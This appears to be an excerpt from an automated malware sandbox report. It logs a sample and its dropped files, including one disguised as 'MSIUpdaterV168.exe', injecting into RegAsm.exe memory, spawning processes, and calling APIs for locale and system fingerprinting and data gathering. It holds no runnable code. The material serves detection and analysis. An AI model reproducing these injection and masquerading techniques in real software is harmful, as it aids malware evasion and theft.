Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58A000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 58C000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: EC9008	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 425000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E81008
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DA4008
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 425000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11BE008
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10EC008
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 425000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 643000
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10CF008
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 442000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 454000
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: FC9008

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 7548 -ip 7548	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe "C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8jZLXI789L2zXDjlm7Fx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\3f61nAONpe1PsLC0oJHy.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_e08a8d55b50864bc6ca07cda5a9c96c8\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: unknown unknown
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Process created: unknown unknown

Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003499000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.0000000003499000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002BC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Source: C:\Users\user\Desktop\zyJWi2vy29.exe

Code function: 0_2_0032779C cpuid

0_2_0032779C

Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetLocaleInfoW,	0_2_00336831
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: EnumSystemLocalesW,	0_2_0033D83B
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: EnumSystemLocalesW,	0_2_0033D886
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: EnumSystemLocalesW,	0_2_0033D921
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0033D9AC
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: EnumSystemLocalesW,	0_2_003362CB
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetLocaleInfoW,	0_2_0033DBFF
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0033DD28
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_0033D599
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetLocaleInfoW,	0_2_0033DE2E
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0033DEFD
Source: C:\Users\user\Desktop\zyJWi2vy29.exe	Code function: GetLocaleInfoW,	0_2_0033D794
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: EnumSystemLocalesW,	10_2_006ED83B
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetLocaleInfoW,	10_2_006E6831
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: EnumSystemLocalesW,	10_2_006ED886
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: EnumSystemLocalesW,	10_2_006ED921
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_006ED9AC
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: EnumSystemLocalesW,	10_2_006E62CB
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetLocaleInfoW,	10_2_006EDBFF
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_006EDD28
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	10_2_006ED599
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetLocaleInfoW,	10_2_006EDE2E
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_006EDEFD
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\6p7a7injLZJojhETBNhL.exe	Code function: GetLocaleInfoW,	10_2_006ED794
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	12_2_00136831
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	12_2_0013D83B
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	12_2_0013D886
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	12_2_0013D921
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	12_2_0013D9AC
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	12_2_001362CB
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	12_2_0013DBFF
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	12_2_0013DD28
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	12_2_0013D599
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	12_2_0013DE2E
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	12_2_0013DEFD
Source: C:\ProgramData\MSIUpdaterV168_6a6c6289978e81e233ec951dd09be6ea\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	12_2_0013D794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	20_2_004531CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	20_2_0044B1B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	20_2_004532F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	20_2_004533F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	20_2_004534CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	20_2_0044B734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	20_2_00452B5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	20_2_00452D5F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoEx,FormatMessageA,	20_2_00431D94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	20_2_00452E51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	20_2_00452E06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	20_2_00452EEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	20_2_00452F77
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError,CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,	20_2_004DFF00
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: EnumSystemLocalesW,	22_2_00E4888C
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	22_2_00E50870
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: EnumSystemLocalesW,	22_2_00E501F9
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: EnumSystemLocalesW,	22_2_00E501AE
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetLocaleInfoW,	22_2_00E50107
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: EnumSystemLocalesW,	22_2_00E50294
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	22_2_00E5031F
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetLocaleInfoW,	22_2_00E48DF2
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetLocaleInfoW,	22_2_00E50572
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	22_2_00E5069B
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetLocaleInfoW,	22_2_00E507A1
Source: C:\Users\user\AppData\Local\Temp\span3qyfLZqnmIGj\8x9h3ctqkpfTu0sNF0X2.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	22_2_00E4FF0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	24_2_20072CB6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	24_2_20072D38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	24_2_20072DF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_20073300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_1FE83AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: EnumSystemLocalesW,	24_2_2005FF17
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	24_2_1FE82112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetLocaleInfoW,	24_2_1FE82112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	24_2_00411D31
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	32_2_00C6D886
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	32_2_00C66831
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	32_2_00C6D83B
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	32_2_00C6D9AC
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	32_2_00C6D921
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: EnumSystemLocalesW,	32_2_00C662CB
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	32_2_00C6DBFF
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	32_2_00C6D599
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	32_2_00C6DD28
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	32_2_00C6DEFD
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	32_2_00C6DE2E
Source: C:\ProgramData\MSIUpdaterV168_9602278fd5a666ce6ca3a5ad676c9c5a\MSIUpdaterV168.exe	Code function: GetLocaleInfoW,	32_2_00C6D794

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
